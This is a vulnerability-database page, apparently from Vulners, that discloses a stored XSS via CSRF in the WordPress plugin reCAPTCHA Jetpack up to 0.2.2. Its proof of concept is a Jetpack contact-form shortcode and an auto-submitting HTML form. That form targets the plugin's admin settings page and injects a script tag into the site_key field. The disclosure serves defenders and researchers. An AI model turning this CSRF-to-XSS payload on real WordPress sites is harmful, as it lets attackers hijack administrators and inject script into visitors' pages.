Lucene search

K

reCAPTCHA Jetpack <= 0.2.2 - Stored XSS via CSRF

๐Ÿ—“๏ธย 19 Apr 2024ย 00:00:00Reported byย Bob MatyasTypeย 
wpexploit
ย wpexploit
๐Ÿ‘ย 79ย Views

reCAPTCHA Jetpack 0.2.2 XSS CSR

Show more
Related
Code
This requires Jetpack to be installed and to have a page/post with a Jetpack Contact Form.

Add a post/page containing a Jetpack Contact Form shortcode:

```
[contact-form][contact-field label="Name" type="name"  required="true" /][contact-field label="Email" type="email" required="true" /][contact-field label="Message" type="textarea" /][/contact-form]
```

Once there is a form using Jetpack, make a logged in admin open an HTML document containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=recaptcha-jetpack" method="post">
        <input type="hidden" name="site_key" value='"><script>alert(4)</script>' />
        <input type="hidden" name="secret_key" value='csrf2222' />
        <input type="hidden" name="recaptcha_type" value="v2" />
        <input type="hidden" name="submit" value="Save Changes" />
        <input type="submit" name="enter" id="enter" value="Submit">
    </form>
</body>
```

View the post/page containing the form and see the XSS

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
19 Apr 2024 00:00Current
5.9Medium risk
Vulners AI Score5.9
EPSS0.0004
79
.json
Report